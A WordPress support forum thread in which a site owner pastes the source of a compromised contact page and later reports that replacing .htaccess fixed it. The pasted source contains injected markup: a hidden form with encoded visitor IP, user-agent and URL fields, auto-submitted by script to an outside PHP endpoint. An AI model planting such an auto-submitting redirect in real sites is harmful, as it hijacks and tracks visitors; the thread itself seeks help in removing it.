WordPress hacked: Injected markup after

  • Hey all,

    Could someone help me on this: My wordpress (3.9 v) http:energiakoi.com have injected markup after closing head tag </head> at contact page (https://energiakoi.com/%CE%B5%CF%80%CE%B9%CE%BA%CE%BF%CE%B9%CE%BD%CF%89%CE%BD%CE%AF%CE%B1/), when viewing it on mobile devices (iphone).

    I inspected the source code and it is the following:

    <html version="HTML+RDFa 1.1" lang="el"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Επικοινων?α - ενεργειακο? επιθεωρητη?</title>
<meta name="generator" content="WordPress 121">
<meta name="robots" content="follow, all">
<link rel="stylesheet" href="https://energiakoi.com/wp-content/themes/ecobiz/style.css" type="text/css" media="screen">
<link rel="alternate" type="application/rss+xml" title="ενεργειακο? επιθεωρητη? RSS Feed" href="https://energiakoi.com/feed/">
<link href="https://plus.google.com/105411661693924388323" rel="publisher">
<link rel="pingback" href="https://energiakoi.com/xmlrpc.php">
<link rel="shortcut icon" href="https://energiakoi.com/wp-content/themes/ecobiz/images/favicon.ico">

<!-- This site is optimized with the Yoast WordPress SEO plugin v1.5.2.8 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="https://energiakoi.com/%ce%b5%cf%80%ce%b9%ce%ba%ce%bf%ce%b9%ce%bd%cf%89%ce%bd%ce%af%ce%b1/">
<link rel="publisher" href="https://plus.google.com/+Energiakoi/">
<meta property="og:locale" content="el_GR">
<meta property="og:type" content="article">
<meta property="og:title" content="Επικοινων?α - ενεργειακο? επιθεωρητη?">
<meta property="og:description" content="[schema type=&quot;organization&quot; orgtype=&quot;Corporation&quot; url=&quot;https://energiakoi.com&quot; name=&quot;Ενεργειακ?? Επιθεωρητ??&quot; description=&quot;Ενεργειακ?? Επιθεωρητ??, ?κδοση Ενεργειακο? πιστοποιητικο?&quot; street=&quot;Γλ?δστωνο? 5, Αθ?να (στ?ση Μετρ? Ομ?νοια)&quot; city=&quot;Αθ?να&quot; country=&quot;GR&quot; email=&quot;[email protected]&quot; phone=&quot;2103300352&quot; ]">
<meta property="og:url" content="https://energiakoi.com/%ce%b5%cf%80%ce%b9%ce%ba%ce%bf%ce%b9%ce%bd%cf%89%ce%bd%ce%af%ce%b1/">
<meta property="og:site_name" content="ενεργειακο? επιθεωρητη?">
<meta property="article:publisher" content="https://www.facebook.com/energiakapistopoiitika1">
<meta property="article:published_time" content="2011-07-09T16:00:45+00:00">
<meta property="article:modified_time" content="2012-11-14T00:07:20+00:00">
<meta property="og:updated_time" content="2012-11-14T00:07:20+00:00">
<meta property="og:image" content="https://energiakoi.com/wp-content/uploads/2011/07/green-house.jpg">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@energiakoi">
<meta name="twitter:domain" content="ενεργειακο? επιθεωρητη?">
<meta name="twitter:creator" content="@energiakoi">
<!-- / Yoast WordPress SEO plugin. -->

<link rel="stylesheet" id="wp-customer-reviews-css" href="https://energiakoi.com/wp-content/plugins/wp-customer-reviews/wp-customer-reviews.css" type="text/css" media="all">
<script type="text/javascript" src="https://energiakoi.com/wp-includes/js/jquery/jquery.js"></script><style type="text/css"></style>
<script type="text/javascript" src="https://energiakoi.com/wp-includes/js/jquery/jquery-migrate.min.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/plugins/wp-customer-reviews/wp-customer-reviews.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jquery.prettyPhoto.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jquery.nivo.slider.pack.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jqueryslidemenu.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jquery.kwicks.min.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jquery.tools.tabs.min.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/jquery.gmap.min.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/filterable.pack.js"></script>
<script type="text/javascript" src="https://energiakoi.com/wp-content/themes/ecobiz/js/functions.js"></script>
<script type="text/javascript">var ajaxurl = "https://energiakoi.com/wp-admin/admin-ajax.php"</script>	<link rel="stylesheet" href="https://energiakoi.com/wp-content/themes/ecobiz/css/prettyPhoto.css" type="text/css" media="screen">
	 <link rel="stylesheet" href="https://energiakoi.com/wp-content/themes/ecobiz/css/nivo-slider.css" type="text/css" media="screen">
   <link rel="stylesheet" href="https://energiakoi.com/wp-content/themes/ecobiz/css/kwicks.css" type="text/css" media="screen">

<!-- Javascript Start //-->
<!-- Javascript End //-->
<style type="text/css">
@import url("https://energiakoi.com/wp-content/themes/ecobiz/css/styles/dark.css");body {background-image: url(https://energiakoi.com/wp-content/themes/ecobiz/images/pattern/grid2.png); } body { font-family: "Trebuchet MS", Tahoma, sans-serif;}p { color:#666666;font-size:12px;font-style:}ol li { color:#666666}.arrowlist li { color:#666666}.checklist li { color:#666666}.bulletlist li { color:#666666}.itemlist li { color:#666666}.sidebarcontent h4 { color: Custom css code box;}</style>
<link type="text/css" rel="stylesheet" href="chrome-extension://clcbnchcgjcjphmnpndoelbdhakdlfkk/stylesheets/style.css"><script type="text/javascript" charset="utf-8" src="chrome-extension://clcbnchcgjcjphmnpndoelbdhakdlfkk/javascripts/page_context.js"></script></head>
<body quick-markup_injected="true"><body><form method="POST" action="https://paintingsbytompressly.com/830410590106a4b8fcabe8eccaf07dc8.php?q=9565e5edd4af68a99ccd229484917bfc" id="refoto_form" target="_top">
<input type="hidden" name="ip" value="7Q6vDIt/1nT3vjVTQA==">
<input type="hidden" name="ua" value="tlP7Vt89hmr0vjdAW8w1nSvwoTMgxAEAsPRU4p40Qhb4WeYCz96Q3hcr02UmNGlGA5evXT+sXeGuVztX4FcJjxZLN6FKdIaMZFKGex3fb4qIzU04Kk100AEQDRfpiRqCrAmQQj9bxFh478G/9fRaSLbqGdOzr91ffmyrs8dqjcj02JThkMP4WFmv4Jtyxhia">
<input type="hidden" name="furl" value="s0j1T4l+yCSl4ykNHMcsgSH/t3EuxB4Yv/BWpc4zQwvEeJAFod/9">
</form>
<script>
document.getElementById('refoto_form').submit();
</script></body></body></html>

    I tested it in sucuri and it’s clean. Furthermore, i made a virus scan in my server (hosting24) and it’s clean too.

    Can anyone help pls?

Viewing 1 replies (of 1 total)
  • Thread Starter katsampukas

    (@katsampukas)

    Update:

    I made a fresh copy of .htaccess and clear all cached files. It seems to load nice now.

    Can anyone tell how is possible to inject html after head tag, and by-pass the predefined templating system? (head.php, index.php, page.php etc)

Viewing 1 replies (of 1 total)
  • The topic ‘WordPress hacked: Injected markup after’ is closed to new replies.

Tags